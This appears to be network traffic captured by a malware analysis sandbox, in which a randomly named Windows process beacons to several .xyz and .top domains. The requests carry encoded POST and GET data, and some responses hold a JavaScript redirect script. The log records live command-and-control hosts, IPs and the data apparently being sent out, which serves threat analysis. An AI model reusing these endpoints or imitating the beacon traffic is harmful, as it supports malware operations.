                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=FSwoOmqr8YoFe0ICS7fGD8JMTP0Ng094NTRLFVG+vSF6CM2tXHocRdulud7oJPGhtqptbxJ6Fo8vn75TYELoSHH/aPd0OkmWReIGkU9ksVwD5TrFbhbIzBFVsmWxAxU9XkhqQik87Oa4TavS/fRr+4lF31i5ypTBJg2g1DtnO9Lh3mTNyRJ8x4/aFEEwqXqf8ZPCwm8Ia/M/w8MKZg==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.9 | 49734 | 188.114.97.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:35.406910896 CEST | 1869 | OUT | POST /srh8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.globaltrend.xyz
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.globaltrend.xyz
                                                      Referer: http://www.globaltrend.xyz/srh8/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.9 | 49735 | 188.114.97.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:38.004076958 CEST | 567 | OUT | GET /srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.globaltrend.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:39.950083971 CEST | 657 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 09 Jul 2024 10:09:39 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://www.globaltrend.xyz
                                                      X-Powered-By: PHP/7.4.6
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cw7nfhUzjNXBsAHsu19wxSiy3KtxqXk2DnMQn2A%2F6mVvWrPCUomfTI79VMiaDUYTGcoMYqg1ojbID7dJecVnkyv5BLQPQTKtWp3Q6ixWrZgDnWz31fR2rn9GtXv2%2Br5xMRAx3hDH"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a078507089dc40e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.9 | 49736 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:45.087320089 CEST | 817 | OUT | POST /y7ar/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ffi07s.xyz
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.ffi07s.xyz
                                                      Referer: http://www.ffi07s.xyz/y7ar/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=BpjM1753d9U43aEKmBQ0ZAGJc1unSeWwk8ih743Gqq5hqu9XIiBtlIidIZKCcThQPJbp8owgojASHPBCBYeensMpVceM2XZo6SPbFP8P3JBvf9vgcfsLYzjzzPSty/N9gu0ft4zN+F3nqoJJ+0V9oigGnnL3Oxp6q6GrjKz7sGOIFc9oUhoXRy4UGeZY
                                                      Jul 9, 2024 12:09:45.960496902 CEST | 890 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:45 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lRLjnKnb6m%2FNFuJVhLLnR87HvA7TixrfpwVhIhOGD8iuBYKSawC8WFn2Xz8lVkVoeHYc%2FNDSkUXxK5%2F%2FpDealfy%2BP1M1jDJEM9cvfeTc68GF5o8hzjndM9eEeyySYjcng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0785332c278cba-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.9 | 49737 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:47.673365116 CEST | 841 | OUT | POST /y7ar/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ffi07s.xyz
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.ffi07s.xyz
                                                      Referer: http://www.ffi07s.xyz/y7ar/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=BpjM1753d9U42+4KrAQ0MQGKXVunY+W0k8uh75zWqZdhqPtXJnttgIidD5KHYThXPJGU8p8gojUSHLJCBvCRkcMrc8e0yXZo6SPbFPBk3JJvfN/gd74KGjjy0PSt4fM2gu1yt8zn+HPnqp5J/m9+migc63KGehgWqLeTiJeQxXCoC9d2FThMEl4zB5QwV5ARMjoP8VLXQ58A3kZsqQ==
                                                      Jul 9, 2024 12:09:48.562292099 CEST | 886 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:48 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tbB1IVtzmAALw6w487BfEl8wHN7TLu1UEbzaemxPWpEmlGyUH8x7ZQofwZz1ASITEHoTAX%2BvAnRKpGQnibEk195%2B9jVuA4urDVYgmHUdO1YzH4bBag%2Bww59qFrgwy4Mfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0785435bb96a5f-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.9 | 49738 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:50.267985106 CEST | 1854 | OUT | POST /y7ar/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ffi07s.xyz
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.ffi07s.xyz
                                                      Referer: http://www.ffi07s.xyz/y7ar/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:51.124180079 CEST | 890 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:51 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPR%2FbKwVoeKOOgpIs%2FuciWz6Un4VHFXYev0EsEzqhsb0vf8IuI0pH4ciZEtNxMqtpNmCAErJXYin2SdKMYy1HnqP9i5%2BvNfhKhYNupHBb%2BhicBTRDrgPMA2llrLdZEcfwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a078553881f0f8b-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.9 | 49739 | 188.114.96.3 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:09:52.842521906 CEST | 562 | OUT | GET /y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.ffi07s.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:53.716774940 CEST | 913 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:53 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCRg47DPFKj4inlIhUwV0x07Y7XsBvb5GG5qpgFM3%2BNlPbvUyRwVKE1h15CLBZEK6A5MVlEaTEoqx1uoCIFSyZZ2ruI02YfqEbup2RH2TsXtaRWlzxN%2FufjjBx8X%2BuqlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a078563aaa97cf9-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.9 | 49740 | 154.12.34.252 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:00.222301960 CEST | 811 | OUT | POST /y0md/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.j51a.xyz
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.j51a.xyz
                                                      Referer: http://www.j51a.xyz/y0md/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=ojwlwz5hjBb//olh6Vg4rWyT26XmHns6Zm1UNg4MipAUObci0DZh86zE1e7RTjyoqWLlmX7TJTWmkZ17jM4ur9V/uFGWFO0BxFT82ssB0+bZ+36V7mPXcrNk302tiLPJQlOlayFdJBZwqkhet2o3wcYaXGz3F6LNjGvij2fspXX9VVXj+uev9QXCFvOp
                                                      Jul 9, 2024 12:10:00.720489025 CEST | 557 | IN | HTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      26 | 192.168.2.9 | 49741 | 154.12.34.252 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:02.804054976 CEST | 835 | OUT | POST /y0md/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.j51a.xyz
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.j51a.xyz
                                                      Referer: http://www.j51a.xyz/y0md/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Ascii: lv-=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjb0UO+Yi7iZh76zEtO7ULDy3qWOYmXHTJTqmkYF7j954ttV921GYLu0BxFT82sIn0+TZ+nKV7EnISLNjgE2tmLPNQlOXazJ7JCxwqhletHph5cYYamzmC6a8mEu+gQPYzGueS039vcX0oHXlCIHBXBWP78nnF4UAPXLR/5zW5Q==
                                                      Jul 9, 2024 12:10:03.301872969 CEST | 557 | IN | HTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      27          192.168.2.9  49742        154.12.34.252   80                5488  C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 9, 2024 12:10:05.373657942 CEST  1848               OUT        POST /y0md/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.j51a.xyz
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.j51a.xyz
                                                      Referer: http://www.j51a.xyz/y0md/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:05.913011074 CEST  557                IN         HTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      28          192.168.2.9  49743        154.12.34.252   80                5488  C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 9, 2024 12:10:07.968761921 CEST  560                OUT        GET /y0md/?lv-=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XjftXonC7MPI4x3rx8vtk99+YtwuNug==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.j51a.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:08.450248003 CEST  557                IN         HTTP/1.0 200 OK
                                                      Connection: close
                                                      Cache-Control: max-age=259200
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 428
                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      29          192.168.2.9  49744        162.254.38.56   80                5488  C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 9, 2024 12:10:13.803996086 CEST  820                OUT        POST /soqq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dospole.top
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dospole.top
                                                      Referer: http://www.dospole.top/soqq/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:14.385708094 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:14 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      30          192.168.2.9  49745        162.254.38.56   80                5488  C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 9, 2024 12:10:16.382255077 CEST  844                OUT        POST /soqq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dospole.top
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dospole.top
                                                      Referer: http://www.dospole.top/soqq/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:16.950479031 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:16 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      31          192.168.2.9  49746        162.254.38.56   80                5488  C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp                            Bytes transferred  Direction  Data
                                                      Jul 9, 2024 12:10:18.963701010 CEST  1857               OUT        POST /soqq/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dospole.top
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dospole.top
                                                      Referer: http://www.dospole.top/soqq/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:19.623357058 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:19 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      32 | 192.168.2.9 | 49747 | 162.254.38.56 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:21.548355103 CEST | 563 | OUT | GET /soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.dospole.top
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:10:22.168304920 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:10:22 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      33 | 192.168.2.9 | 49748 | 5.252.229.221 | 80 | 5488 | C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 9, 2024 12:10:27.367615938 CEST | 838 | OUT | POST /3ooi/ HTTP/1.1
